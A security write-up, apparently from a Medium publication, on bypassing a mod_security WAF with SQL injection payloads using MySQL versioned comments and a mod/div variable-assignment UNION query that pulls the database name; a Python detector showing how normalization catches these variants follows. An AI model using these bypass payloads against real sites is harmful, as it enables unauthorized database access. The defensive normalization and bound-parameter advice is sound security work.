InfoSec Write-ups

Member-only story

Fun SQL injection — mod_security bypass

In this write-up I would like to show you a somewhat peculiar case that I came across while testing a website.

This is an SQL injection where I could bypass the “mod_security” WAF.
When I started the SQL injection test I realised that the website was using that WAF.

We get the WAF error page when using a simple payload like:

site/ejemplo?parameter=-1+union+selec+1,2,3,4,5,6,7+--+

Now, I’m not going to lie to you: just by wrapping the keywords of the payload in MySQL versioned comments, I was able to bypass the WAF filter.

site/ejemplo?parameter=-1+/*!50000union*/+/*!50000selec*/+1,2,3,4,5,6,7+--+

We can see that one of the vulnerable columns is number four.

But like every lover of SQL injection, I decided not to leave it there and to try other methods and other payloads. After many tests and failed mixed payloads, I ended up trying this:

AND mod(29,9)+div+@a:=(concat(database(),"--","_Y000!_"))+UNION+DISTINCTROW+SELECT+1,2,3,@a,5,6,7

Now what is this all about?

We have:

"AND" = The AND operator returns a record if all conditions separated by AND are TRUE.
"mod(29,9)" = The mod function is to make a…
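Looking at these payloads from the defender's side, the point of the versioned-comment trick is that MySQL executes the text inside `/*!50000 ... */`, while a signature that only matches keywords at word boundaries sees `50000union` as a single token and never fires. The Python below is an added example, not code from the write-up or from mod_security: it applies one deliberately naive UNION/SELECT signature first to the raw parameter and then to a normalized form that URL-decodes, unwraps versioned comments and strips ordinary block comments. The sample values are constructed to mirror the shapes of the payloads above (one of them percent-encoded as well); they are not captured traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample parameter values (not captured traffic). The first three
# mirror the shapes of the write-up's payloads; "url_encoded" is the second one
# with the comment characters percent-encoded; "benign" is an ordinary value.
SAMPLES = {
    "plain": "-1+union+selec+1,2,3,4,5,6,7+--+",
    "versioned_comment": "-1+/*!50000union*/+/*!50000selec*/+1,2,3,4,5,6,7+--+",
    "url_encoded": "-1+%2F%2A%2150000union%2A%2F+%2F%2A%2150000selec%2A%2F+1,2,3",
    "mod_div_var": 'AND mod(29,9)+div+@a:=(concat(database(),"--","_Y000!_"))'
                   "+UNION+DISTINCTROW+SELECT+1,2,3,@a,5,6,7",
    "benign": "42",
}

# A deliberately naive signature: UNION followed later by SELEC(T), each
# matched only at a word boundary. This is the style of check that the
# versioned-comment payload slips past, because "50000union" is one word.
NAIVE_UNION_SELECT = re.compile(r"\bunion\b[\s\S]*?\bselec", re.IGNORECASE)

# MySQL "versioned" comment /*!NNNNN text */: the server executes "text",
# so a detector must unwrap it rather than treat it as a comment.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.DOTALL)
# Ordinary block comments contribute nothing to execution: drop them.
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
WHITESPACE = re.compile(r"\s+")


def normalize(param: str) -> str:
    """Return the parameter roughly as the SQL parser would see it."""
    s = unquote_plus(param)                 # %2F -> "/", "+" -> " "
    s = VERSIONED_COMMENT.sub(r" \1 ", s)   # /*!50000union*/ -> " union "
    s = BLOCK_COMMENT.sub(" ", s)           # /**/ -> " "
    return WHITESPACE.sub(" ", s).strip().lower()


def naive_match(param: str) -> bool:
    """Signature applied to the raw parameter, as a weak rule would."""
    return bool(NAIVE_UNION_SELECT.search(param))


def normalized_match(param: str) -> bool:
    """Same signature, applied after decoding and comment normalization."""
    return bool(NAIVE_UNION_SELECT.search(normalize(param)))


def evaluate(samples=SAMPLES):
    """Map each sample name to (naive_hit, normalized_hit)."""
    return {name: (naive_match(v), normalized_match(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, (raw_hit, norm_hit) in evaluate().items():
        print(f"{name:18s} raw={raw_hit!s:5s} normalized={norm_hit}")
        print(f"{'':18s} -> {normalize(SAMPLES[name])}")
```

Running it shows the plain payload caught both ways, the two versioned-comment variants missed on the raw value but caught once normalized, and the benign value untouched. Normalizing before matching is what closes this particular gap, and the same idea applies to any rule that reasons about SQL keywords. It is a detection aid, not a fix: the query stays injectable until the application passes the parameter to the database as a bound value instead of concatenating it into the SQL string.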


A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by _Y000_

Hi, welcome to my Medium profile! I'm Y000! 😊 Who am I? 🤔 Well… I'm me, haha. I'm just someone passionate about information security.

Responses (1)

Thank you for sharing this! I've just checked Wallarm; we are good with the same payloads.